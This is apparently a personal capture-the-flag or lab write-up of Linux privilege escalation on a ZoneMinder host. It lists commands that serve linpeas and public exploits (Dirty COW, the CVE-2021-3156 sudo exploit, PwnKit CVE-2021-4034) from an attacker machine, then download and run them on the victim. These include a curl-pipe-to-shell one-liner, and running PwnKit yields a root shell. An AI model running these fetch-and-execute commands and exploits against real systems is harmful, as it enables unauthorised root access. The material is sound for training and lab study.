Privilege escalation [Got] [Own]

Loading linpeas:

# in kali linux
python3 -m http.server 80 -d $(dirname $(locate linpeas.sh))


# in victim machine
cd /tmp
wget http://192.168.45.219/linpeas.sh
chmod a+x linpeas.sh
./linpeas.sh

There is lots of suggested exploit.

╔══════════╣ Searching passwords in config PHP files
/usr/share/zoneminder/www/api/app/Config/database.php:          'password' => 'password',
/usr/share/zoneminder/www/api/app/Config/database.php:          'password' => 'zmpass',
/usr/share/zoneminder/www/includes/config.php:    "Password"  => "",

Trying Dirty Cow Exploit

searchsploit -m 40839
python3 -m http.server 80

wget http://192.168.45.219/40839.c

Transfert the file.

Gcc is not there :-(

Trying Python sudo exploit.

wget https://raw.githubusercontent.com/worawit/CVE-2021-3156/refs/heads/main/exploit_nss.py

python3 -m http.server 80

# in victim machine:
wget http://192.168.45.242/exploit_nss.py

Trying Pwnkit vulnerability [Worked]

Below is the original command:

GitHub - ly4k/PwnKit: Self-contained exploit for CVE-2021-4034 - Pkexec Local Privilege EscalationGitHub

sh -c "$(curl -fsSL https://raw.githubusercontent.com/ly4k/PwnKit/main/PwnKit.sh)"

I will download .sh file first in kali linux and start the server.

curl -fsSL https://raw.githubusercontent.com/ly4k/PwnKit/main/PwnKit -o PwnKit || exit
python3 -m http.server 80

Run below command in victim machine...

wget  http://192.168.45.242/PwnKit ;  chmod +x ./PwnKit ; ./PwnKit

After running the above command you will get the shell as root.

Previoushttp [Initial Access]Nextproof.txt

Last updated 1 year ago

Was this helpful?

hashtagTrying Dirty Cow Exploit

hashtagTrying Python sudo exploit.

hashtagTrying Pwnkit vulnerability [Worked]

Trying Dirty Cow Exploit

Trying Python sudo exploit.

Trying Pwnkit vulnerability [Worked]